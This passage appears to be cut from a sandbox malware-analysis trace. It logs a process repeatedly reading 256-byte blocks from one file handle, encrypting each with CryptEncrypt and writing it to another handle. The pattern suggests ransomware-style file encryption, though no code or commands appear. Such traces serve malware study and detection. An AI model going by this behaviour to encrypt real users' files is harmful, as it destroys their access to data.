pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.314] GetLastError () returned 0x0 [0168.314] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.314] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.314] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.314] GetLastError () returned 0x0 [0168.314] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.314] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.314] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.314] GetLastError () returned 0x0 [0168.314] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.314] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.315] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.315] GetLastError () returned 0x0 [0168.315] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.315] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.315] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.315] GetLastError () returned 0x0 [0168.315] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.315] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.315] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.315] GetLastError () returned 0x0 [0168.315] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.315] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.315] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.315] GetLastError () returned 0x0 [0168.315] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.315] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.315] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.315] GetLastError () returned 0x0 [0168.315] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.315] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.315] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.315] GetLastError () returned 0x0 [0168.315] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.315] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.316] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.316] GetLastError () returned 0x0 [0168.316] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.316] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.316] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.316] GetLastError () returned 0x0 [0168.316] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.316] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.316] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.316] GetLastError () returned 0x0 [0168.316] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.316] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.316] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.316] GetLastError () returned 0x0 [0168.316] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.316] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.316] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.316] GetLastError () returned 0x0 [0168.316] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.316] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.316] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.316] GetLastError () returned 0x0 [0168.316] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.316] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.316] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.316] GetLastError () returned 0x0 [0168.316] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.317] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.317] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.317] GetLastError () returned 0x0 [0168.317] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.317] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.317] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.317] GetLastError () returned 0x0 [0168.317] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.317] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.317] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.317] GetLastError () returned 0x0 [0168.317] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.317] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.317] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.317] GetLastError () returned 0x0 [0168.317] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.317] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.317] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.317] GetLastError () returned 0x0 [0168.317] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.317] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.317] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.317] GetLastError () returned 0x0 [0168.317] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.317] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.318] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.318] GetLastError () returned 0x0 [0168.318] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.318] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.318] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.318] GetLastError () returned 0x0 [0168.318] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.318] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.318] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.318] GetLastError () returned 0x0 [0168.318] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.318] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.318] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.318] GetLastError () returned 0x0 [0168.318] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.318] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.318] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.318] GetLastError () returned 0x0 [0168.318] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.318] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.318] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.318] GetLastError () returned 0x0 [0168.319] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.319] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.319] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.319] GetLastError () returned 0x0 [0168.319] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.319] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.319] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.319] GetLastError () returned 0x0 [0168.319] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.319] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.319] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.319] GetLastError () returned 0x0 [0168.319] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.319] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.320] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.320] GetLastError () returned 0x0 [0168.320] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.320] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.320] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.320] 